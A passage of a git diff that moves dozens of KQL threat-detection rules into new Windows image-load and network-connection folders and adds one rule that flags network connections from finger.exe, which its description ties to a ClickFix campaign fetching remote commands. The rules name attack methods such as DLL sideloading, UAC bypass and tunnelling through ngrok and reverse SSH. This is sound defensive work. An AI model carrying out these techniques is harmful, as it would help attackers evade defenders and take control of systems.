b/KQL/rules/windows/image_load/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql similarity index 100% rename from KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql rename to KQL/rules/windows/image_load/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgcore_dll.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql rename to KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgcore_dll.kql diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbghelp_dll.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql rename to KQL/rules/windows/image_load/potential_dll_sideloading_of_dbghelp_dll.kql diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgmodel_dll.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql rename to KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgmodel_dll.kql diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql rename to KQL/rules/windows/image_load/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_mpsvc_dll.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql rename to KQL/rules/windows/image_load/potential_dll_sideloading_of_mpsvc_dll.kql diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_mscorsvc_dll.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql rename to KQL/rules/windows/image_load/potential_dll_sideloading_of_mscorsvc_dll.kql diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_using_coregen_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql rename to KQL/rules/windows/image_load/potential_dll_sideloading_using_coregen_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_classicexplorer32_dll.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql rename to KQL/rules/windows/image_load/potential_dll_sideloading_via_classicexplorer32_dll.kql diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_comctl32_dll.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql rename to KQL/rules/windows/image_load/potential_dll_sideloading_via_comctl32_dll.kql diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_jsschhlp.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql rename to KQL/rules/windows/image_load/potential_dll_sideloading_via_jsschhlp.kql diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_via_vmware_xfer.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql rename to KQL/rules/windows/image_load/potential_dll_sideloading_via_vmware_xfer.kql diff --git a/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_eacore_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_eacore_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_eacore_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_edputil_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_edputil_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_edputil_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_goopdate_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_goopdate_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_iviewers_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_iviewers_dll_sideloading.kql diff --git a/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_libvlc_dll_sideloading.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_libvlc_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_mfdetours_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_mfdetours_dll_sideloading.kql diff --git a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_mpclient_dll_sideloading.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_mpclient_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_rcdll_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_rcdll_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql b/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_default_location.kql similarity index 100% rename from KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql rename to KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_default_location.kql diff --git a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql b/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_non_default_location.kql similarity index 100% rename from KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql rename to KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_non_default_location.kql diff --git a/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_roboform_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_roboform_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_roboform_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_shelldispatch_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_shelldispatch_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_smadhook_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_smadhook_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_solidpdfcreator_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_solidpdfcreator_dll_sideloading.kql diff --git a/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql b/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql rename to KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql diff --git a/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_vivaldi_elf_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_vivaldi_elf_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_waveedit_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_waveedit_dll_sideloading.kql diff --git a/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_wazuh_security_platform_dll_sideloading.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_wazuh_security_platform_dll_sideloading.kql diff --git a/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_wwlib_dll_sideloading.kql similarity index 100% rename from KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql rename to KQL/rules/windows/image_load/potential_wwlib_dll_sideloading.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql b/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql rename to KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql diff --git a/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql b/KQL/rules/windows/image_load/powershell_core_dll_loaded_by_non_powershell_process.kql similarity index 100% rename from KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql rename to KQL/rules/windows/image_load/powershell_core_dll_loaded_by_non_powershell_process.kql diff --git a/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql b/KQL/rules/windows/image_load/powershell_core_dll_loaded_via_office_application.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql rename to KQL/rules/windows/image_load/powershell_core_dll_loaded_via_office_application.kql diff --git a/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql b/KQL/rules/windows/image_load/python_image_load_by_non_python_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql rename to KQL/rules/windows/image_load/python_image_load_by_non_python_process.kql diff --git a/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql b/KQL/rules/windows/image_load/remote_dll_load_via_rundll32_exe.kql similarity index 100% rename from KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql rename to KQL/rules/windows/image_load/remote_dll_load_via_rundll32_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql b/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vss_ps_dll_load.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql rename to KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vss_ps_dll_load.kql diff --git a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql b/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vssapi_dll_load.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql rename to KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vssapi_dll_load.kql diff --git a/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql b/KQL/rules/windows/image_load/suspicious_wsman_provider_image_loads.kql similarity index 100% rename from KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql rename to KQL/rules/windows/image_load/suspicious_wsman_provider_image_loads.kql diff --git a/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql b/KQL/rules/windows/image_load/system_control_panel_item_loaded_from_uncommon_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql rename to KQL/rules/windows/image_load/system_control_panel_item_loaded_from_uncommon_location.kql diff --git a/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql b/KQL/rules/windows/image_load/third_party_software_dll_sideloading.kql similarity index 100% rename from KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql rename to KQL/rules/windows/image_load/third_party_software_dll_sideloading.kql diff --git a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql b/KQL/rules/windows/image_load/time_travel_debugging_utility_usage_image.kql similarity index 100% rename from KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql rename to KQL/rules/windows/image_load/time_travel_debugging_utility_usage_image.kql diff --git a/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql b/KQL/rules/windows/image_load/trusted_path_bypass_via_windows_directory_spoofing.kql similarity index 100% rename from KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql rename to KQL/rules/windows/image_load/trusted_path_bypass_via_windows_directory_spoofing.kql diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql b/KQL/rules/windows/image_load/uac_bypass_using_iscsicpl_imageload.kql similarity index 100% rename from KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql rename to KQL/rules/windows/image_load/uac_bypass_using_iscsicpl_imageload.kql diff --git a/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql b/KQL/rules/windows/image_load/uac_bypass_with_fake_dll.kql similarity index 100% rename from KQL/rules/Persistence/uac_bypass_with_fake_dll.kql rename to KQL/rules/windows/image_load/uac_bypass_with_fake_dll.kql diff --git a/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql b/KQL/rules/windows/image_load/vba_dll_loaded_via_office_application.kql similarity index 100% rename from KQL/rules/Execution/vba_dll_loaded_via_office_application.kql rename to KQL/rules/windows/image_load/vba_dll_loaded_via_office_application.kql diff --git a/KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql b/KQL/rules/windows/image_load/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql similarity index 100% rename from KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql rename to KQL/rules/windows/image_load/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql diff --git a/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql b/KQL/rules/windows/image_load/wmi_persistence_command_line_event_consumer.kql similarity index 100% rename from KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql rename to KQL/rules/windows/image_load/wmi_persistence_command_line_event_consumer.kql diff --git a/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql similarity index 100% rename from KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql rename to KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql diff --git a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql b/KQL/rules/windows/image_load/wmiprvse_wbemcomn_dll_hijack.kql similarity index 100% rename from KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql rename to KQL/rules/windows/image_load/wmiprvse_wbemcomn_dll_hijack.kql diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql b/KQL/rules/windows/network_connection/communication_to_localtonet_tunneling_service_initiated.kql similarity index 100% rename from KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql rename to KQL/rules/windows/network_connection/communication_to_localtonet_tunneling_service_initiated.kql diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql b/KQL/rules/windows/network_connection/communication_to_ngrok_tunneling_service_initiated.kql similarity index 100% rename from KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql rename to KQL/rules/windows/network_connection/communication_to_ngrok_tunneling_service_initiated.kql diff --git a/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql b/KQL/rules/windows/network_connection/communication_to_uncommon_destination_ports.kql similarity index 100% rename from KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql rename to KQL/rules/windows/network_connection/communication_to_uncommon_destination_ports.kql diff --git a/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/windows/network_connection/local_network_connection_initiated_by_script_interpreter.kql similarity index 100% rename from KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql rename to KQL/rules/windows/network_connection/local_network_connection_initiated_by_script_interpreter.kql diff --git a/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql b/KQL/rules/windows/network_connection/microsoft_sync_center_suspicious_network_connections.kql similarity index 100% rename from KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql rename to KQL/rules/windows/network_connection/microsoft_sync_center_suspicious_network_connections.kql diff --git a/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql b/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql similarity index 100% rename from KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql rename to KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql diff --git a/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql b/KQL/rules/windows/network_connection/network_communication_initiated_to_portmap_io_domain.kql similarity index 100% rename from KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql rename to KQL/rules/windows/network_connection/network_communication_initiated_to_portmap_io_domain.kql diff --git a/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql b/KQL/rules/windows/network_connection/network_communication_with_crypto_mining_pool.kql similarity index 100% rename from KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql rename to KQL/rules/windows/network_connection/network_communication_with_crypto_mining_pool.kql diff --git a/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_addinutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_by_addinutil_exe.kql diff --git a/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_eqnedt32_exe.kql similarity index 100% rename from KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_by_eqnedt32_exe.kql diff --git a/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_imewdbld_exe.kql similarity index 100% rename from KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_by_imewdbld_exe.kql diff --git a/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_regsvr32_exe.kql similarity index 100% rename from KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_by_regsvr32_exe.kql diff --git a/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql b/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql similarity index 100% rename from KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql diff --git a/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql similarity index 100% rename from KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_btunnels_domains.kql similarity index 100% rename from KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_to_btunnels_domains.kql diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_cloudflared_tunnels_domains.kql similarity index 100% rename from KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_to_cloudflared_tunnels_domains.kql diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_devtunnels_domain.kql similarity index 100% rename from KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_to_devtunnels_domain.kql diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_mega_nz.kql similarity index 100% rename from KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_to_mega_nz.kql diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql similarity index 100% rename from KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql new file mode 100644 index 00000000..4f4f0ae3 --- /dev/null +++ b/KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql @@ -0,0 +1,15 @@ +// Title: Network Connection Initiated via Finger.EXE +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-19 +// Level: high +// Description: Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices. +// In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server. +// Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion. +// Investigating such network connections can also help identify potential malicious infrastructure used by threat actors +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.004, attack.execution, attack.t1059.003 +// False Positives: +// - Unlikely + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\finger.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_via_notepad_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql rename to KQL/rules/windows/network_connection/network_connection_initiated_via_notepad_exe.kql diff --git a/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql b/KQL/rules/windows/network_connection/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql similarity index 100% rename from KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql rename to KQL/rules/windows/network_connection/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql diff --git a/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql b/KQL/rules/windows/network_connection/office_application_initiated_network_connection_over_uncommon_ports.kql similarity index 100% rename from KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql rename to KQL/rules/windows/network_connection/office_application_initiated_network_connection_over_uncommon_ports.kql diff --git a/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql b/KQL/rules/windows/network_connection/office_application_initiated_network_connection_to_non_local_ip.kql similarity index 100% rename from KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql rename to KQL/rules/windows/network_connection/office_application_initiated_network_connection_to_non_local_ip.kql diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_cmstp_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql rename to KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_cmstp_exe.kql diff --git a/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_microsoft_dialer.kql similarity index 100% rename from KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql rename to KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_microsoft_dialer.kql diff --git a/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_script_interpreter.kql similarity index 100% rename from KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql rename to KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_script_interpreter.kql diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql b/KQL/rules/windows/network_connection/outbound_network_connection_to_public_ip_via_winlogon.kql similarity index 100% rename from KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql rename to KQL/rules/windows/network_connection/outbound_network_connection_to_public_ip_via_winlogon.kql diff --git a/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql b/KQL/rules/windows/network_connection/outbound_rdp_connections_over_non_standard_tools.kql similarity index 100% rename from KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql rename to KQL/rules/windows/network_connection/outbound_rdp_connections_over_non_standard_tools.kql diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql b/KQL/rules/windows/network_connection/potentially_suspicious_malware_callback_communication.kql similarity index 100% rename from KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql rename to KQL/rules/windows/network_connection/potentially_suspicious_malware_callback_communication.kql diff --git a/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql b/KQL/rules/windows/network_connection/potentially_suspicious_network_connection_to_notion_api.kql similarity index 100% rename from KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql rename to KQL/rules/windows/network_connection/potentially_suspicious_network_connection_to_notion_api.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql b/KQL/rules/windows/network_connection/potentially_suspicious_wuauclt_network_connection.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql rename to KQL/rules/windows/network_connection/potentially_suspicious_wuauclt_network_connection.kql diff --git a/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql b/KQL/rules/windows/network_connection/process_initiated_network_connection_to_ngrok_domain.kql similarity index 100% rename from KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql rename to KQL/rules/windows/network_connection/process_initiated_network_connection_to_ngrok_domain.kql diff --git a/KQL/rules/Discovery/python_initiated_connection.kql b/KQL/rules/windows/network_connection/python_initiated_connection.kql similarity index 100% rename from KQL/rules/Discovery/python_initiated_connection.kql rename to KQL/rules/windows/network_connection/python_initiated_connection.kql diff --git a/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql b/KQL/rules/windows/network_connection/rdp_over_reverse_ssh_tunnel.kql similarity index 100% rename from KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql rename to KQL/rules/windows/network_connection/rdp_over_reverse_ssh_tunnel.kql diff --git a/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql b/KQL/rules/windows/network_connection/rdp_to_http_or_https_target_ports.kql similarity index 100% rename from KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql rename to KQL/rules/windows/network_connection/rdp_to_http_or_https_target_ports.kql diff --git a/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql b/KQL/rules/windows/network_connection/regasm_exe_initiating_network_connection_to_public_ip.kql similarity index 100% rename from KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql rename to KQL/rules/windows/network_connection/regasm_exe_initiating_network_connection_to_public_ip.kql diff --git a/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql b/KQL/rules/windows/network_connection/remote_access_tool_anydesk_incoming_connection.kql similarity index 100% rename from KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql rename to 